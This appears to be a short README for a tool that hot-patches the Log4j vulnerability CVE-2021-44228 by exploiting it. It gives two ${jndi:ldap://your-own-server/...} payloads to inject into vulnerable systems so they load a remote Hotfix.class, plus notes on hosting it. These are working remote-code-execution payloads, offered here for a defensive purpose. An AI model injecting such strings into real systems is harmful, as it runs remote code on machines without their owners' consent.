Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
Inject the following code to anywhere likely vulnerable to CVE-2021-44228,
${jndi:ldap://your-own-server/patch}
To prevent MITM attack during the patch process, the following payload is recommended, but with less compatibility for older versions of Java,
${jndi:ldap://your-own-server/any_string_except_patch}
Download the latest releases
Specify system environment variables LOG4J_HOTFIX_HTTP_PATH
and LOG4J_HOTFIX_HTTPS_PATH
if you want to host Hotfix.class on your own server
Please note Hotfix.java should be compiled with JDK6 for maximum compatibility.